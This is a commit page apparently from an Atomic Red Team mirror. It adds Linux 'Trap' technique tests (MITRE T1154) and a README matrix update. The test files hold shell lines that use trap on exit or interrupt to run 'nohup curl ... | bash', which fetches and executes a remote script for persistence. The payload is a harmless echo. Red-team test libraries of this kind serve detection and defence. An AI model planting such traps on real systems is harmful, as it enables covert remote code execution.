security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #2 from ForensicITGuy/linux-goodness

Browse Source 
Linux goodness
This commit is contained in:
Tony M Lambert
2018-02-13 15:14:54 -06:00
committed by GitHub
parent 6e445c7d65 03bcfd5c04
commit cba719ea81
4 changed files with 27 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Linux/Execution/Trap.md
+14
View File
@@ -0,0 +1,14 @@
# Trap
MITRE ATT&CK Technique: [T1154](https://attack.mitre.org/wiki/Technique/T1154)
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash' EXIT
exit
After exiting the shell, the script will download and execute.
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash' INT
After sending a keyboard interrupt (CTRL+C) the script will download and execute.
Linux/Payloads/echo-art-fish.sh
+2
View File
@@ -0,0 +1,2 @@
#! /bin/bash
echo So long, and thanks for all the fish! > /tmp/art-fish.txt
Linux/Persistence/Trap.md
+10
View File
@@ -0,0 +1,10 @@
# Trap
MITRE ATT&CK Technique: [T1154](https://attack.mitre.org/wiki/Technique/T1154)
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash' EXIT
exit
After exiting the shell, the script will download and execute.
Linux/README.md
+1 -1
View File
@@ -8,7 +8,7 @@
| Hidden Files and Directories | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol |
| Rc.common | Web Shell | File Deletion | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data from Local System | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol |
| Redundant Access | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding |
| Trap | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | Trap | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation |
| [Trap](Persistence/Trap.md) | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | [Trap](Execution/Trap.md) | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation |
| Valid Accounts | | Indicator Removal from Tools | Private Keys | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | | | Input Capture | Exfiltration Over Physical Medium | Fallback Channels |
| Web Shell | | Indicator Removal on Host | Two-Factor Authentication Interception | System Network Connections Discovery | | | Screen Capture | Scheduled Transfer | Multi-Stage Channels |
| | | Install Root Certificate | | System Owner/User Discovery | | | | | Multiband Communication |